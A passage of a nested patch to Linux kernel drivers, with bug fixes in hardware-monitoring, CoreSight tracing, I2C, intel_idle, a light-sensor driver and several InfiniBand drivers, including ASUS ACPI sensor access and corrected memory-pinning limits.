+-	return sprintf(buf, "%u\n", data->temp_input[index]);
++	value = (data->temp_input[index] - 64) * 1000;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_fault_show(struct device *dev,
+@@ -436,13 +441,15 @@ static ssize_t fan_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->fan_input[index]);
++	value = data->fan_input[index] * 60;
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t fan_source_show(struct device *dev,
+diff --git a/drivers/hwmon/ltc2945.c b/drivers/hwmon/ltc2945.c
+index 9adebb59f6042..c06ab7317431f 100644
+--- a/drivers/hwmon/ltc2945.c
++++ b/drivers/hwmon/ltc2945.c
+@@ -248,6 +248,8 @@ static ssize_t ltc2945_value_store(struct device *dev,
+ 
+ 	/* convert to register value, then clamp and write result */
+ 	regval = ltc2945_val_to_reg(dev, reg, val);
++	if (regval < 0)
++		return regval;
+ 	if (is_power_reg(reg)) {
+ 		regval = clamp_val(regval, 0, 0xffffff);
+ 		regbuf[0] = regval >> 16;
+diff --git a/drivers/hwmon/mlxreg-fan.c b/drivers/hwmon/mlxreg-fan.c
+index b48bd7c961d66..96017cc8da7ec 100644
+--- a/drivers/hwmon/mlxreg-fan.c
++++ b/drivers/hwmon/mlxreg-fan.c
+@@ -155,6 +155,12 @@ mlxreg_fan_read(struct device *dev, enum hwmon_sensor_types type, u32 attr,
+ 			if (err)
+ 				return err;
+ 
++			if (MLXREG_FAN_GET_FAULT(regval, tacho->mask)) {
++				/* FAN is broken - return zero for FAN speed. */
++				*val = 0;
++				return 0;
++			}
++
+ 			*val = MLXREG_FAN_GET_RPM(regval, fan->divider,
+ 						  fan->samples);
+ 			break;
+diff --git a/drivers/hwmon/nct6775-core.c b/drivers/hwmon/nct6775-core.c
+index da9ec6983e139..c54233f0369b2 100644
+--- a/drivers/hwmon/nct6775-core.c
++++ b/drivers/hwmon/nct6775-core.c
+@@ -1150,7 +1150,7 @@ static int nct6775_write_fan_div(struct nct6775_data *data, int nr)
+ 	if (err)
+ 		return err;
+ 	reg &= 0x70 >> oddshift;
+-	reg |= data->fan_div[nr] & (0x7 << oddshift);
++	reg |= (data->fan_div[nr] & 0x7) << oddshift;
+ 	return nct6775_write_value(data, fandiv_reg, reg);
+ }
+ 
+diff --git a/drivers/hwmon/nct6775-platform.c b/drivers/hwmon/nct6775-platform.c
+index bf43f73dc835f..76c6b564d7fc4 100644
+--- a/drivers/hwmon/nct6775-platform.c
++++ b/drivers/hwmon/nct6775-platform.c
+@@ -17,7 +17,6 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include <linux/regmap.h>
+-#include <linux/wmi.h>
+ 
+ #include "nct6775.h"
+ 
+@@ -107,40 +106,51 @@ struct nct6775_sio_data {
+ 	void (*sio_exit)(struct nct6775_sio_data *sio_data);
+ };
+ 
+-#define ASUSWMI_MONITORING_GUID		"466747A0-70EC-11DE-8A39-0800200C9A66"
++#define ASUSWMI_METHOD			"WMBD"
+ #define ASUSWMI_METHODID_RSIO		0x5253494F
+ #define ASUSWMI_METHODID_WSIO		0x5753494F
+ #define ASUSWMI_METHODID_RHWM		0x5248574D
+ #define ASUSWMI_METHODID_WHWM		0x5748574D
+ #define ASUSWMI_UNSUPPORTED_METHOD	0xFFFFFFFE
++#define ASUSWMI_DEVICE_HID		"PNP0C14"
++#define ASUSWMI_DEVICE_UID		"ASUSWMI"
++#define ASUSMSI_DEVICE_UID		"AsusMbSwInterface"
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * ASUS boards have only one device with WMI "WMBD" method and have provided
++ * access to only one SuperIO chip at 0x0290.
++ */
++static struct acpi_device *asus_acpi_dev;
++#endif
+ 
+ static int nct6775_asuswmi_evaluate_method(u32 method_id, u8 bank, u8 reg, u8 val, u32 *retval)
+ {
+-#if IS_ENABLED(CONFIG_ACPI_WMI)
++#if IS_ENABLED(CONFIG_ACPI)
++	acpi_handle handle = acpi_device_handle(asus_acpi_dev);
+ 	u32 args = bank | (reg << 8) | (val << 16);
+-	struct acpi_buffer input = { (acpi_size) sizeof(args), &args };
+-	struct acpi_buffer output = { ACPI_ALLOCATE_BUFFER, NULL };
++	struct acpi_object_list input;
++	union acpi_object params[3];
++	unsigned long long result;
+ 	acpi_status status;
+-	union acpi_object *obj;
+-	u32 tmp = ASUSWMI_UNSUPPORTED_METHOD;
+-
+-	status = wmi_evaluate_method(ASUSWMI_MONITORING_GUID, 0,
+-				     method_id, &input, &output);
+ 
++	params[0].type = ACPI_TYPE_INTEGER;
++	params[0].integer.value = 0;
++	params[1].type = ACPI_TYPE_INTEGER;
++	params[1].integer.value = method_id;
++	params[2].type = ACPI_TYPE_BUFFER;
++	params[2].buffer.length = sizeof(args);
++	params[2].buffer.pointer = (void *)&args;
++	input.count = 3;
++	input.pointer = params;
++
++	status = acpi_evaluate_integer(handle, ASUSWMI_METHOD, &input, &result);
+ 	if (ACPI_FAILURE(status))
+ 		return -EIO;
+ 
+-	obj = output.pointer;
+-	if (obj && obj->type == ACPI_TYPE_INTEGER)
+-		tmp = obj->integer.value;
+-
+ 	if (retval)
+-		*retval = tmp;
+-
+-	kfree(obj);
++		*retval = (u32)result & 0xFFFFFFFF;
+ 
+-	if (tmp == ASUSWMI_UNSUPPORTED_METHOD)
+-		return -ENODEV;
+ 	return 0;
+ #else
+ 	return -EOPNOTSUPP;
+@@ -1099,6 +1109,91 @@ static const char * const asus_wmi_boards[] = {
+ 	"TUF GAMING Z490-PLUS (WI-FI)",
+ };
+ 
++static const char * const asus_msi_boards[] = {
++	"EX-B660M-V5 PRO D4",
++	"PRIME B650-PLUS",
++	"PRIME B650M-A",
++	"PRIME B650M-A AX",
++	"PRIME B650M-A II",
++	"PRIME B650M-A WIFI",
++	"PRIME B650M-A WIFI II",
++	"PRIME B660M-A D4",
++	"PRIME B660M-A WIFI D4",
++	"PRIME X670-P",
++	"PRIME X670-P WIFI",
++	"PRIME X670E-PRO WIFI",
++	"Pro B660M-C-D4",
++	"ProArt B660-CREATOR D4",
++	"ProArt X670E-CREATOR WIFI",
++	"ROG CROSSHAIR X670E EXTREME",
++	"ROG CROSSHAIR X670E GENE",
++	"ROG CROSSHAIR X670E HERO",
++	"ROG MAXIMUS XIII EXTREME GLACIAL",
++	"ROG MAXIMUS Z690 EXTREME",
++	"ROG MAXIMUS Z690 EXTREME GLACIAL",
++	"ROG STRIX B650-A GAMING WIFI",
++	"ROG STRIX B650E-E GAMING WIFI",
++	"ROG STRIX B650E-F GAMING WIFI",
++	"ROG STRIX B650E-I GAMING WIFI",
++	"ROG STRIX B660-A GAMING WIFI D4",
++	"ROG STRIX B660-F GAMING WIFI",
++	"ROG STRIX B660-G GAMING WIFI",
++	"ROG STRIX B660-I GAMING WIFI",
++	"ROG STRIX X670E-A GAMING WIFI",
++	"ROG STRIX X670E-E GAMING WIFI",
++	"ROG STRIX X670E-F GAMING WIFI",
++	"ROG STRIX X670E-I GAMING WIFI",
++	"ROG STRIX Z590-A GAMING WIFI II",
++	"ROG STRIX Z690-A GAMING WIFI D4",
++	"TUF GAMING B650-PLUS",
++	"TUF GAMING B650-PLUS WIFI",
++	"TUF GAMING B650M-PLUS",
++	"TUF GAMING B650M-PLUS WIFI",
++	"TUF GAMING B660M-PLUS WIFI",
++	"TUF GAMING X670E-PLUS",
++	"TUF GAMING X670E-PLUS WIFI",
++	"TUF GAMING Z590-PLUS WIFI",
++};
++
++#if IS_ENABLED(CONFIG_ACPI)
++/*
++ * Callback for acpi_bus_for_each_dev() to find the right device
++ * by _UID and _HID and return 1 to stop iteration.
++ */
++static int nct6775_asuswmi_device_match(struct device *dev, void *data)
++{
++	struct acpi_device *adev = to_acpi_device(dev);
++	const char *uid = acpi_device_uid(adev);
++	const char *hid = acpi_device_hid(adev);
++
++	if (hid && !strcmp(hid, ASUSWMI_DEVICE_HID) && uid && !strcmp(uid, data)) {
++		asus_acpi_dev = adev;
++		return 1;
++	}
++
++	return 0;
++}
++#endif
++
++static enum sensor_access nct6775_determine_access(const char *device_uid)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	u8 tmp;
++
++	acpi_bus_for_each_dev(nct6775_asuswmi_device_match, (void *)device_uid);
++	if (!asus_acpi_dev)
++		return access_direct;
++
++	/* if reading chip id via ACPI succeeds, use WMI "WMBD" method for access */
++	if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
++		pr_debug("Using Asus WMBD method of %s to access %#x chip.\n", device_uid, tmp);
++		return access_asuswmi;
++	}
++#endif
++
++	return access_direct;
++}
++
+ static int __init sensors_nct6775_platform_init(void)
+ {
+ 	int i, err;
+@@ -1109,7 +1204,6 @@ static int __init sensors_nct6775_platform_init(void)
+ 	int sioaddr[2] = { 0x2e, 0x4e };
+ 	enum sensor_access access = access_direct;
+ 	const char *board_vendor, *board_name;
+-	u8 tmp;
+ 
+ 	err = platform_driver_register(&nct6775_driver);
+ 	if (err)
+@@ -1122,15 +1216,13 @@ static int __init sensors_nct6775_platform_init(void)
+ 	    !strcmp(board_vendor, "ASUSTeK COMPUTER INC.")) {
+ 		err = match_string(asus_wmi_boards, ARRAY_SIZE(asus_wmi_boards),
+ 				   board_name);
+-		if (err >= 0) {
+-			/* if reading chip id via WMI succeeds, use WMI */
+-			if (!nct6775_asuswmi_read(0, NCT6775_PORT_CHIPID, &tmp) && tmp) {
+-				pr_info("Using Asus WMI to access %#x chip.\n", tmp);
+-				access = access_asuswmi;
+-			} else {
+-				pr_err("Can't read ChipID by Asus WMI.\n");
+-			}
+-		}
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSWMI_DEVICE_UID);
++
++		err = match_string(asus_msi_boards, ARRAY_SIZE(asus_msi_boards),
++				   board_name);
++		if (err >= 0)
++			access = nct6775_determine_access(ASUSMSI_DEVICE_UID);
+ 	}
+ 
+ 	/*
+diff --git a/drivers/hwmon/peci/cputemp.c b/drivers/hwmon/peci/cputemp.c
+index 57470fda5f6c9..30850a479f61f 100644
+--- a/drivers/hwmon/peci/cputemp.c
++++ b/drivers/hwmon/peci/cputemp.c
+@@ -402,7 +402,7 @@ static int create_temp_label(struct peci_cputemp *priv)
+ 	unsigned long core_max = find_last_bit(priv->core_mask, CORE_NUMS_MAX);
+ 	int i;
+ 
+-	priv->coretemp_label = devm_kzalloc(priv->dev, core_max * sizeof(char *), GFP_KERNEL);
++	priv->coretemp_label = devm_kzalloc(priv->dev, (core_max + 1) * sizeof(char *), GFP_KERNEL);
+ 	if (!priv->coretemp_label)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-cti-core.c b/drivers/hwtracing/coresight/coresight-cti-core.c
+index d2cf4f4848e1b..838872f2484d3 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-core.c
++++ b/drivers/hwtracing/coresight/coresight-cti-core.c
+@@ -151,9 +151,16 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ {
+ 	struct cti_config *config = &drvdata->config;
+ 	struct coresight_device *csdev = drvdata->csdev;
++	int ret = 0;
+ 
+ 	spin_lock(&drvdata->spinlock);
+ 
++	/* don't allow negative refcounts, return an error */
++	if (!atomic_read(&drvdata->config.enable_req_count)) {
++		ret = -EINVAL;
++		goto cti_not_disabled;
++	}
++
+ 	/* check refcount - disable on 0 */
+ 	if (atomic_dec_return(&drvdata->config.enable_req_count) > 0)
+ 		goto cti_not_disabled;
+@@ -171,12 +178,12 @@ static int cti_disable_hw(struct cti_drvdata *drvdata)
+ 	coresight_disclaim_device_unlocked(csdev);
+ 	CS_LOCK(drvdata->base);
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ 
+ 	/* not disabled this call */
+ cti_not_disabled:
+ 	spin_unlock(&drvdata->spinlock);
+-	return 0;
++	return ret;
+ }
+ 
+ void cti_write_single_reg(struct cti_drvdata *drvdata, int offset, u32 value)
+diff --git a/drivers/hwtracing/coresight/coresight-cti-sysfs.c b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+index 6d59c815ecf5e..71e7a8266bb32 100644
+--- a/drivers/hwtracing/coresight/coresight-cti-sysfs.c
++++ b/drivers/hwtracing/coresight/coresight-cti-sysfs.c
+@@ -108,10 +108,19 @@ static ssize_t enable_store(struct device *dev,
+ 	if (ret)
+ 		return ret;
+ 
+-	if (val)
++	if (val) {
++		ret = pm_runtime_resume_and_get(dev->parent);
++		if (ret)
++			return ret;
+ 		ret = cti_enable(drvdata->csdev);
+-	else
++		if (ret)
++			pm_runtime_put(dev->parent);
++	} else {
+ 		ret = cti_disable(drvdata->csdev);
++		if (!ret)
++			pm_runtime_put(dev->parent);
++	}
++
+ 	if (ret)
+ 		return ret;
+ 	return size;
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 1cc052979e016..77bca6932f017 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -427,8 +427,10 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, config->vipcssctlr, TRCVIPCSSCTLR);
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, config->seq_ctrl[i], TRCSEQEVRn(i));
+-	etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, config->seq_rst, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, config->seq_state, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, config->ext_inp, TRCEXTINSELR);
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+ 		etm4x_relaxed_write32(csa, config->cntrldvr[i], TRCCNTRLDVRn(i));
+@@ -1634,8 +1636,10 @@ static int __etm4_cpu_save(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		state->trcseqevr[i] = etm4x_read32(csa, TRCSEQEVRn(i));
+ 
+-	state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
+-	state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		state->trcseqrstevr = etm4x_read32(csa, TRCSEQRSTEVR);
++		state->trcseqstr = etm4x_read32(csa, TRCSEQSTR);
++	}
+ 	state->trcextinselr = etm4x_read32(csa, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+@@ -1763,8 +1767,10 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+ 
+-	etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
+-	etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	if (drvdata->nrseqstate) {
++		etm4x_relaxed_write32(csa, state->trcseqrstevr, TRCSEQRSTEVR);
++		etm4x_relaxed_write32(csa, state->trcseqstr, TRCSEQSTR);
++	}
+ 	etm4x_relaxed_write32(csa, state->trcextinselr, TRCEXTINSELR);
+ 
+ 	for (i = 0; i < drvdata->nr_cntr; i++) {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 5d5526aa60c40..30f1525639b57 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -356,8 +356,18 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 
+ static int hisi_ptt_init_filters(struct pci_dev *pdev, void *data)
+ {
++	struct pci_dev *root_port = pcie_find_root_port(pdev);
+ 	struct hisi_ptt_filter_desc *filter;
+ 	struct hisi_ptt *hisi_ptt = data;
++	u32 port_devid;
++
++	if (!root_port)
++		return 0;
++
++	port_devid = PCI_DEVID(root_port->bus->number, root_port->devfn);
++	if (port_devid < hisi_ptt->lower_bdf ||
++	    port_devid > hisi_ptt->upper_bdf)
++		return 0;
+ 
+ 	/*
+ 	 * We won't fail the probe if filter allocation failed here. The filters
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index 581e02cc979a0..2f2e99882b011 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -465,7 +465,7 @@ void __i2c_dw_disable(struct dw_i2c_dev *dev)
+ 	dev_warn(dev->dev, "timeout in disabling adapter\n");
+ }
+ 
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev)
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev)
+ {
+ 	/*
+ 	 * Clock is not necessary if we got LCNT/HCNT values directly from
+diff --git a/drivers/i2c/busses/i2c-designware-core.h b/drivers/i2c/busses/i2c-designware-core.h
+index 95ebc5eaa5d12..6bc2edec14f2f 100644
+--- a/drivers/i2c/busses/i2c-designware-core.h
++++ b/drivers/i2c/busses/i2c-designware-core.h
+@@ -320,7 +320,7 @@ int i2c_dw_init_regmap(struct dw_i2c_dev *dev);
+ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset);
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset);
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev);
+-unsigned long i2c_dw_clk_rate(struct dw_i2c_dev *dev);
++u32 i2c_dw_clk_rate(struct dw_i2c_dev *dev);
+ int i2c_dw_prepare_clk(struct dw_i2c_dev *dev, bool prepare);
+ int i2c_dw_acquire_lock(struct dw_i2c_dev *dev);
+ void i2c_dw_release_lock(struct dw_i2c_dev *dev);
+diff --git a/drivers/i2c/busses/i2c-qcom-geni.c b/drivers/i2c/busses/i2c-qcom-geni.c
+index fd70794bfceec..a378f679b499d 100644
+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -1025,7 +1025,7 @@ static const struct dev_pm_ops geni_i2c_pm_ops = {
+ 									NULL)
+ };
+ 
+-const struct geni_i2c_desc i2c_master_hub = {
++static const struct geni_i2c_desc i2c_master_hub = {
+ 	.has_core_clk = true,
+ 	.icc_ddr = NULL,
+ 	.no_dma_support = true,
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..f060ac7376e69 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -168,13 +168,7 @@ static __cpuidle int intel_idle_irq(struct cpuidle_device *dev,
+ 
+ 	raw_local_irq_enable();
+ 	ret = __intel_idle(dev, drv, index);
+-
+-	/*
+-	 * The lockdep hardirqs state may be changed to 'on' with timer
+-	 * tick interrupt followed by __do_softirq(). Use local_irq_disable()
+-	 * to keep the hardirqs state correct.
+-	 */
+-	local_irq_disable();
++	raw_local_irq_disable();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iio/light/tsl2563.c b/drivers/iio/light/tsl2563.c
+index d0e42b73203a6..71302ae864d99 100644
+--- a/drivers/iio/light/tsl2563.c
++++ b/drivers/iio/light/tsl2563.c
+@@ -704,6 +704,7 @@ static int tsl2563_probe(struct i2c_client *client)
+ 	struct iio_dev *indio_dev;
+ 	struct tsl2563_chip *chip;
+ 	struct tsl2563_platform_data *pdata = client->dev.platform_data;
++	unsigned long irq_flags;
+ 	int err = 0;
+ 	u8 id = 0;
+ 
+@@ -759,10 +760,15 @@ static int tsl2563_probe(struct i2c_client *client)
+ 		indio_dev->info = &tsl2563_info_no_irq;
+ 
+ 	if (client->irq) {
++		irq_flags = irq_get_trigger_type(client->irq);
++		if (irq_flags == IRQF_TRIGGER_NONE)
++			irq_flags = IRQF_TRIGGER_RISING;
++		irq_flags |= IRQF_ONESHOT;
++
+ 		err = devm_request_threaded_irq(&client->dev, client->irq,
+ 					   NULL,
+ 					   &tsl2563_event_handler,
+-					   IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					   irq_flags,
+ 					   "tsl2563_event",
+ 					   indio_dev);
+ 		if (err) {
+diff --git a/drivers/infiniband/hw/cxgb4/cm.c b/drivers/infiniband/hw/cxgb4/cm.c
+index 499a425a33791..ced615b5ea096 100644
+--- a/drivers/infiniband/hw/cxgb4/cm.c
++++ b/drivers/infiniband/hw/cxgb4/cm.c
+@@ -2676,6 +2676,9 @@ static int pass_establish(struct c4iw_dev *dev, struct sk_buff *skb)
+ 	u16 tcp_opt = ntohs(req->tcp_opt);
+ 
+ 	ep = get_ep_from_tid(dev, tid);
++	if (!ep)
++		return 0;
++
+ 	pr_debug("ep %p tid %u\n", ep, ep->hwtid);
+ 	ep->snd_seq = be32_to_cpu(req->snd_isn);
+ 	ep->rcv_seq = be32_to_cpu(req->rcv_isn);
+@@ -4144,6 +4147,10 @@ static int rx_pkt(struct c4iw_dev *dev, struct sk_buff *skb)
+ 
+ 	if (neigh->dev->flags & IFF_LOOPBACK) {
+ 		pdev = ip_dev_find(&init_net, iph->daddr);
++		if (!pdev) {
++			pr_err("%s - failed to find device!\n", __func__);
++			goto free_dst;
++		}
+ 		e = cxgb4_l2t_get(dev->rdev.lldi.l2t, neigh,
+ 				    pdev, 0);
+ 		pi = (struct port_info *)netdev_priv(pdev);
+diff --git a/drivers/infiniband/hw/cxgb4/restrack.c b/drivers/infiniband/hw/cxgb4/restrack.c
+index ff645b955a082..fd22c85d35f4f 100644
+--- a/drivers/infiniband/hw/cxgb4/restrack.c
++++ b/drivers/infiniband/hw/cxgb4/restrack.c
+@@ -238,7 +238,7 @@ int c4iw_fill_res_cm_id_entry(struct sk_buff *msg,
+ 	if (rdma_nl_put_driver_u64_hex(msg, "history", epcp->history))
+ 		goto err_cancel_table;
+ 
+-	if (epcp->state == LISTEN) {
++	if (listen_ep) {
+ 		if (rdma_nl_put_driver_u32(msg, "stid", listen_ep->stid))
+ 			goto err_cancel_table;
+ 		if (rdma_nl_put_driver_u32(msg, "backlog", listen_ep->backlog))
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 5dab1e87975ba..9c30d78730aa1 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -1110,12 +1110,14 @@ int erdma_mmap(struct ib_ucontext *ctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err = -EINVAL;
++		goto put_entry;
+ 	}
+ 
+ 	err = rdma_user_mmap_io(ctx, vma, PFN_DOWN(entry->address), PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++put_entry:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+ 	return err;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index a95b654f52540..8ed20392e9f0d 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3160,8 +3160,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	tx->num_desc++;
+-	if ((unlikely(tx->num_desc == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+@@ -3174,6 +3173,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 		SDMA_MAP_NONE,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index d8170fcbfbdd5..b023fc461bd51 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -631,14 +631,13 @@ static inline void sdma_txclean(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ 				  struct sdma_txreq *tx)
+ {
+-	tx->descp[tx->num_desc].qw[0] |=
+-		SDMA_DESC0_LAST_DESC_FLAG;
+-	tx->descp[tx->num_desc].qw[1] |=
+-		dd->default_desc1;
++	u16 last_desc = tx->num_desc - 1;
++
++	tx->descp[last_desc].qw[0] |= SDMA_DESC0_LAST_DESC_FLAG;
++	tx->descp[last_desc].qw[1] |= dd->default_desc1;
+ 	if (tx->flags & SDMA_TXREQ_F_URGENT)
+-		tx->descp[tx->num_desc].qw[1] |=
+-			(SDMA_DESC1_HEAD_TO_HOST_FLAG |
+-			 SDMA_DESC1_INT_REQ_FLAG);
++		tx->descp[last_desc].qw[1] |= (SDMA_DESC1_HEAD_TO_HOST_FLAG |
++					       SDMA_DESC1_INT_REQ_FLAG);
+ }
+ 
+ static inline int _sdma_txadd_daddr(
+@@ -655,6 +654,7 @@ static inline int _sdma_txadd_daddr(
+ 		type,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
++	tx->num_desc++;
+ 	tx->tlen -= len;
+ 	/* special cases for last */
+ 	if (!tx->tlen) {
+@@ -666,7 +666,6 @@ static inline int _sdma_txadd_daddr(
+ 			_sdma_close_tx(dd, tx);
+ 		}
+ 	}
+-	tx->num_desc++;
+ 	return rval;
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/user_pages.c b/drivers/infiniband/hw/hfi1/user_pages.c
+index 7bce963e2ae69..36aaedc651456 100644
+--- a/drivers/infiniband/hw/hfi1/user_pages.c
++++ b/drivers/infiniband/hw/hfi1/user_pages.c
+@@ -29,33 +29,52 @@ MODULE_PARM_DESC(cache_size, "Send and receive side cache size limit (in MB)");
+ bool hfi1_can_pin_pages(struct hfi1_devdata *dd, struct mm_struct *mm,
+ 			u32 nlocked, u32 npages)
+ {
+-	unsigned long ulimit = rlimit(RLIMIT_MEMLOCK), pinned, cache_limit,
+-		size = (cache_size * (1UL << 20)); /* convert to bytes */
+-	unsigned int usr_ctxts =
+-			dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
+-	bool can_lock = capable(CAP_IPC_LOCK);
++	unsigned long ulimit_pages;
++	unsigned long cache_limit_pages;
++	unsigned int usr_ctxts;
+ 
+ 	/*
+-	 * Calculate per-cache size. The calculation below uses only a quarter
+-	 * of the available per-context limit. This leaves space for other
+-	 * pinning. Should we worry about shared ctxts?
++	 * Perform RLIMIT_MEMLOCK based checks unless CAP_IPC_LOCK is present.
+ 	 */
+-	cache_limit = (ulimit / usr_ctxts) / 4;
+-
+-	/* If ulimit isn't set to "unlimited" and is smaller than cache_size. */
+-	if (ulimit != (-1UL) && size > cache_limit)
+-		size = cache_limit;
+-
+-	/* Convert to number of pages */
+-	size = DIV_ROUND_UP(size, PAGE_SIZE);
+-
+-	pinned = atomic64_read(&mm->pinned_vm);
++	if (!capable(CAP_IPC_LOCK)) {
++		ulimit_pages =
++			DIV_ROUND_DOWN_ULL(rlimit(RLIMIT_MEMLOCK), PAGE_SIZE);
++
++		/*
++		 * Pinning these pages would exceed this process's locked memory
++		 * limit.
++		 */
++		if (atomic64_read(&mm->pinned_vm) + npages > ulimit_pages)
++			return false;
++
++		/*
++		 * Only allow 1/4 of the user's RLIMIT_MEMLOCK to be used for HFI
++		 * caches.  This fraction is then equally distributed among all
++		 * existing user contexts.  Note that if RLIMIT_MEMLOCK is
++		 * 'unlimited' (-1), the value of this limit will be > 2^42 pages
++		 * (2^64 / 2^12 / 2^8 / 2^2).
++		 *
++		 * The effectiveness of this check may be reduced if I/O occurs on
++		 * some user contexts before all user contexts are created.  This
++		 * check assumes that this process is the only one using this
++		 * context (e.g., the corresponding fd was not passed to another
++		 * process for concurrent access) as there is no per-context,
++		 * per-process tracking of pinned pages.  It also assumes that each
++		 * user context has only one cache to limit.
++		 */
++		usr_ctxts = dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
++		if (nlocked + npages > (ulimit_pages / usr_ctxts / 4))
++			return false;
++	}
+ 
+-	/* First, check the absolute limit against all pinned pages. */
+-	if (pinned + npages >= ulimit && !can_lock)
++	/*
++	 * Pinning these pages would exceed the size limit for this cache.
++	 */
++	cache_limit_pages = cache_size * (1024 * 1024) / PAGE_SIZE;
++	if (nlocked + npages > cache_limit_pages)
+ 		return false;
+ 
+-	return ((nlocked + npages) <= size) || can_lock;
++	return true;
+ }
+ 
+ int hfi1_acquire_user_pages(struct mm_struct *mm, unsigned long vaddr, size_t npages,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 8ba68ac12388d..946ba1109e878 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -443,14 +443,15 @@ static int hns_roce_mmap(struct ib_ucontext *uctx, struct vm_area_struct *vma)
